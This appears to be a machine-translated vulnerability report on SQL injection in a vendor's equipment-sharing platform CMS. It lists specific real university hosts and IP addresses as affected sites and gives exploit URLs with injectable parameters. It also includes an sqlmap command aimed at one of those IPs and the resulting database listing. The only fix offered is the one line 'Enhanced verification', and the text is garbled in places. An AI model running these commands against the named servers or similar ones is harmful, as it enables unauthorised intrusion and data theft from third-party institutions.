Multiple SA permissions in CMS of a device sharing platform SQL Injection package #1
What went wrong was the "large instrument and equipment sharing platform system" developed by the vendor"
About: http://www.wanxinsoft.com/product1_1.asp
Some cases:
The http://sys.zafu.edu.cn: 81/
Http: // 210.27.176.162/
Http://sys.zafu.edu.cn/dy/
Http: // 202.114.168.176/
Http: // 59.69.101.10/
The two vulnerability files are:
/Model/TwoGradePage/newsdetail. aspx
/Model/TwoGradePage/NewsEquipment. aspx
Vulnerability exploitation Demonstration:
Http: // 202.114.168.176/model/TwoGradePage/newsdetail. aspx? Id = 133 & columnId = 99
Http: // 202.114.168.176/model/TwoGradePage/NewsEquipment. aspx? OpenID = 82 & id = 11316
Sqlmap. py-u "http: // 202.114.168.176/model/TwoGradePage/newsdetail. aspx? Id = 133 & columnId = 99"
-- Dbsavailable databases [6]:
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Pubs
[*] Tempdb
Solution:
Enhanced verification